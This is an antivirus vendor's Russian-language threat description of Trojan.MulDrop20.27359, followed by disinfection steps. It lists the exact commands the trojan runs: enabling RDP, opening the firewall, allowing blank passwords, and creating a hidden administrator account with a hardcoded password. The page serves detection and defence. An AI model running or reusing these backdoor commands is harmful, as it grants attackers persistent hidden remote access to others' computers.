Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.MulDrop20.27359

Добавлен в вирусную базу Dr.Web: 2022-08-02

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения
Устанавливает следующие настройки сервисов
  • [<HKLM>\System\CurrentControlSet\Services\TermService] 'Start' = '00000002'
Вредоносные функции
Запускает на исполнение
  • '<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
Изменения в файловой системе
Создает следующие файлы
  • %TEMP%\cdba.tmp\cdca.tmp\cdcb.bat
Другое
Создает и запускает на исполнение
  • '<SYSTEM32>\cmd.exe' /c "%TEMP%\CDBA.tmp\CDCA.tmp\CDCB.bat <Полный путь к файлу>"' (со скрытым окном)
Запускает на исполнение
  • '<SYSTEM32>\cmd.exe' /c "%TEMP%\CDBA.tmp\CDCA.tmp\CDCB.bat <Полный путь к файлу>"
  • '<SYSTEM32>\net.exe' start Termservice
  • '<SYSTEM32>\sc.exe' config TermService start= auto
  • '<SYSTEM32>\reg.exe' add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /
  • '<SYSTEM32>\reg.exe' add "HKLM\system\CurrentControlSet\Control\Lsa" /v LimitBlankPasswordUse /t REG_DWORD /d 0 /f
  • '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /f /d 0 /v Support Systems
  • '<SYSTEM32>\reg.exe' add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v systemw /t REG_DWORD /d 0x0 /f
  • '<SYSTEM32>\reg.exe' add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxIdleTime" /t REG_DWORD /d 0x0 /f
  • '<SYSTEM32>\reg.exe' add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxDisconnectionTime" /t REG_DWORD /d 0x0 /f
  • '<SYSTEM32>\reg.exe' add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxConnectionTime" /t REG_DWORD /d 0x1 /f
  • '<SYSTEM32>\reg.exe' add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
  • '<SYSTEM32>\reg.exe' add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
  • '<SYSTEM32>\net1.exe' start Termservice
  • '<SYSTEM32>\net1.exe' accounts /forcelogoff:no /maxpwage:unlimited
  • '<SYSTEM32>\net1.exe' localgroup "Remote Desktop Users" systemw /add
  • '<SYSTEM32>\net.exe' localgroup "Remote Desktop Users" systemw /add
  • '<SYSTEM32>\wbem\wmic.exe' Group Where "SID = 'S-1-5-32-555'" Get Name /Value
  • '<SYSTEM32>\cmd.exe' /c wmic Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
  • '<SYSTEM32>\net1.exe' localgroup Administrators systemw /add
  • '<SYSTEM32>\net.exe' localgroup Administrators systemw /add
  • '<SYSTEM32>\net1.exe' user systemw y7B4Y7eBm2 /add /active:"yes" /expires:"never" /passwordchg:"NO" /fullname:"Support Systems" /comment:"Built-in account for supported the computer/domain"
  • '<SYSTEM32>\net.exe' user systemw y7B4Y7eBm2 /add /active:"yes" /expires:"never" /passwordchg:"NO" /fullname:"Support Systems" /comment:"Built-in account for supported the computer/domain"
  • '<SYSTEM32>\find.exe' "="
  • '<SYSTEM32>\wbem\wmic.exe' Group Where "SID = 'S-1-5-32-544'" Get Name /Value
  • '<SYSTEM32>\cmd.exe' /c wmic Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
  • '<SYSTEM32>\net.exe' accounts /forcelogoff:no /maxpwage:unlimited
  • '<SYSTEM32>\netsh.exe'

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке